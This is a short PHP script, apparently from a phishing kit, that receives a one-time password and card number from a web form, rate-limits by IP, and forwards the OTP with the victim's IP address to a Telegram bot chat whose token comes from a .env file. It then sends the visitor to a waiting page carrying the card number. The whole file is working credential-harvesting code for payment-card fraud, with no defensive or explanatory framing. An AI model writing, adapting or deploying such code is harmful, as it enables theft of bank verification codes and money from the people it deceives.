<?php
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    require_once 'ip_tracker.php';
    
    $userIp = $_SERVER['REMOTE_ADDR'];
    if (!checkIPLimit($userIp)) {
        die("Too many attempts from your IP address. Please try again later.");
    }

    function loadEnv($path) {
    if (!file_exists($path)) return;

    foreach (file($path, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES) as $line) {
        if (str_starts_with(trim($line), '#')) continue;
        list($key, $value) = explode('=', $line, 2);
        $_ENV[trim($key)] = trim($value);
        putenv("$key=$value");
    }
}

loadEnv(__DIR__ . '/.env');

    function send_message($message) {
                $botToken = $_ENV['BOT_TOKEN'];
$chatId = $_ENV['CHAT_ID'];
        $telegramUrl = "https://api.telegram.org/bot$botToken/sendMessage";
        $telegramData = [
            'chat_id' => $chatId,
            'text' => $message,
            'parse_mode' => 'HTML'
        ];

        $telegramOptions = [
            'http' => [
                'header' => "Content-Type: application/json\r\n",
                'method' => 'POST',
                'content' => json_encode($telegramData)
            ]
        ];

        $telegramContext = stream_context_create($telegramOptions);
        file_get_contents($telegramUrl, false, $telegramContext);
    }

    $otp = preg_replace('/\D/', '', $_POST['otp']); 
    $card = preg_replace('/\D/', '', $_POST['card']); 

    $idFile = 'message_id.txt';

    $currentId = (int)file_get_contents($idFile) - 1;

    $message = "🔑 <b>OTP Doğrulama</b>\n"
            . "🆔 Mesaj ID: <code>$currentId</code>\n"
            . "📩 OTP Kodu: <code>$otp</code>\n"
            . "🌐 IP Adresi: <code>$userIp</code>";

    send_message($message);
    header("Location: wait.html?card=$card");
    exit;

} else {
    http_response_code(405);
    echo "Only POST.";
}
?>
